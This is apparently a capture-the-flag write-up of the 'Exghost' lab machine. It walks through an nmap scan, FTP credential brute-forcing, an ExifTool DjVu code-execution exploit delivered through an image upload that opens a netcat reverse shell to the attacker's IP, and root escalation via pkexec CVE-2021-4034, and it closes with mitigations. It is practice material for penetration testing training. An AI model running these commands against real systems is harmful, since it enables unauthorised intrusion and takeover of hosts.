Exghost | PG Practice
Reconnaissance
Running an nmap scan the following ports where found
# Nmap 7.94SVN scan initiated Wed May 29 09:02:43 2024 as: nmap -p- -T4 -v --min-rate=1000 -sCV -oN nmap.txt 192.168.235.183
Nmap scan report for 192.168.235.183
Host is up (0.15s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: 403 Forbidden
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
Service Info: Host: 127.0.0.1; OS: Unix
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 29 09:05:07 2024 -- 1 IP address (1 host up) scanned in 144.47 seconds
Enumerating FTP I don’t have access to login anonymously
Navigating to the website endpoint we have this 403 forbidden page
I was able to fuzz for an /uploads
directory but turns out to still be 403 Forbidden, all 403 bypass proof failed and i knew this was a dead end.
However i felt like bruteforcing FTP might be a quick win for me sooo i decided to use the tool from GitHub which gave me a valid username and password
git clone https://github.com/rix4uni/FTPBruteForce.git
cd FTPBruteForce
go get -u github.com/jlaffaye/ftp
go run ftp-brute-force-default-credentails.go -ip 192.168.235.183:21
Upon login in i found a backup file and downloaded it to my own machine
Analyzing the backup file with wireshark and looking for captured HTTP packets i found an exiftool
version
Also found out i was able to upload files within an endpoint called /exiftest.php
Which turns out to be true while using the curl
utility, The below command uploads a local file or send data that is typically submitted via web forms with the -F
option and -v
for verbosity.
Also take note of the parameter “myFile
” as this was the variable given in the above screenshot
curl -F "myFile=@./LOCALFILE" http://192.168.235.183/exiftest.php -v
Foothold
Using this blog i was able to create a malicious .jpeg
file due to Improper neutralization of user data in the DjVu
file format in ExifTool
versions 7.44 and up that allows arbitrary code execution when parsing the malicious image.
python3 exploit.py -s 192.168.45.219 4444
Then uploaded it using curl
and got a reverse shell with netcat
curl -F "myFile=@./image.jpg" http://192.168.180.183/exiftest.php -v
nc -lvnp 4444
Privilege Escalation
Running linpeas.sh
on the machine i discovered few SUID binaries exploits, This was real pain as i had to go over each of them and see which was the quick win 🤦‍♀️
Well, privilege escalation was done via the pkexec
exploit popularly know as CVE-2021-4034
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).
You can get the python exploit from here since most of the C
exploits don’t work
Mitigations
- Change default credentials of the
FTP
server to strong, unique passwords and username. - Replace
FTP
with a more secure protocol such asSFTP
(Secure File Transfer Protocol) or FTPS (FTP Secure). - Ensure
ExifTool
is updated to the latest version that includes the security patch, better still remove or restrictExifTool
Usage - Update the
Polkit
package or Disablepkexec
:sudo chmod 0755 /usr/bin/pkexec
Have fun xD
Status Check ⚠️
I shouldn’t be playing boxes 🤣, i have got exams next week but hell yeah, i really don’t wanna be far away from doing this. However i might limit all of this in the coming months, Take of yourselves Fellas :)